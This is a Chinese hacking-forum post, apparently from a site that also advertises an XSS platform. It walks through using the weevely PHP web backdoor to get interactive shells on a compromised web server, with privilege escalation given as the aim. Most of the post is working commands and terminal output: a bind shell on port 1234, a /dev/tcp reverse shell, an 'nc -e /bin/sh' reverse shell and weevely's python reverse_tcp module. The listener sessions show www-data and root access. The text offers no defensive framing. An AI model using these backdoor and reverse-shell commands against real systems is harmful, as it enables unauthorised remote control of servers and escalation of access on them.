切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
233 PHP后门 weevely 4 交换SHELL[复制链接]
发表于 2012-8-26 19:55:20 | 显示全部楼层 |!read_mode!

某些时候必须交换SHELL 例如 提权

1.BIND SHELL

指定端口 1234

  1. www-data@ubuntu:/var/www$ :backdoor.tcp port=1234
  2. [modules.backdoor.tcp] Port open. Run telnet to connect and terminate commands using semicolon
复制代码
连接

  1. root@Dis9Team:/pen/door/Weevely# nc -v 5.5.5.4 1234
  2. Connection to 5.5.5.4 1234 port [tcp/*] succeeded!
  3. /bin/sh: can't access tty; job control turned off
  4. $ id
  5. uid=33(www-data) gid=33(www-data) groups=33(www-data)
  6. $
复制代码
或者METASPLOIT2.reverse_tcp重点 他用4种方式反弹
devtcp, netcat-traditional, netcat-bsd, python1. DEV TCP
  1. exec /bin/sh 0</dev/tcp/远程主机/远程端口 1>&0 2>&0
复制代码
然后远程主机nc 监听例如 SERVER上运行
  1. root@ubuntu:/var/www# exec /bin/sh 0</dev/tcp/5.5.5.2/12345 1>&0 2>&0
复制代码
UB1 监听
  1. root@Dis9Team:/pen/door/Weevely# nc -l -v 12345
  2. Connection from 5.5.5.4 port 12345 [tcp/*] accepted
  3. id
  4. uid=0(root) gid=0(root) groups=0(root)
复制代码
2 NC SHELLnc -e /bin/sh 5.5.5.2 44443.python SHELL这个和其他反弹脚本一样Q 为什么没C?C语言的SHELL很多 但是很多服务器禁止 或者 WEB 没权限一次掩饰我现在用PYTHON,反弹
  1. www-data@ubuntu:/var/www$ :backdoor.reverse_tcp host=5.5.5.2 port=123 vector=python
  2. [modules.backdoor.reverse_tcp] Reverse backdoor connected. End commands with semicolon
复制代码
本地监听
  1. root@Dis9Team:/pen/door/Weevely# nc -l -v 123
  2. Connection from 5.5.5.4 port 123 [tcp/ntp] accepted
  3. /bin/sh: can't access tty; job control turned off
  4. $
复制代码




操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-12-6 09:17

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部